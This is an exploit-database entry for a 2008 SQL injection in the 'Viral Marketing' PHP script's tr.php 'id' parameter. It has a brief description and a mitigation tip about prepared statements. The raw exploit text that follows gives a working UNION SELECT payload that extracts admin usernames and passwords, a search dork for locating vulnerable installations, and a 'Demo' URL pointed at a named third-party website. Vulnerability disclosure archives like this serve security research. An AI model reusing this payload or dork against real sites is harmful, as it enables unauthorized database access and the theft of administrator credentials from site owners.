header-logo
Suggest Exploit
vendor:
Viral Marketing
by:
Hussin X
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Viral Marketing
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Viral Marketing (id) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to the 'tr.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the vulnerable application, disclose sensitive information, modify data, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is recommended to use prepared statements, parameterized queries, or stored procedures when interacting with the database.
Source

Exploit-DB raw data:

Viral Marketing ( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    : http://www.yourfreeworld.com/script/viralmarketing.php

DorK   : Copyright © Viral Marketing 2008

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


Demo :
_______

http://www.downlinegoldmine.com/viralmarketing/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--






Greetz : All my freind

# milw0rm.com [2008-11-01]

Navigation

Suggest Exploit

Services By CQR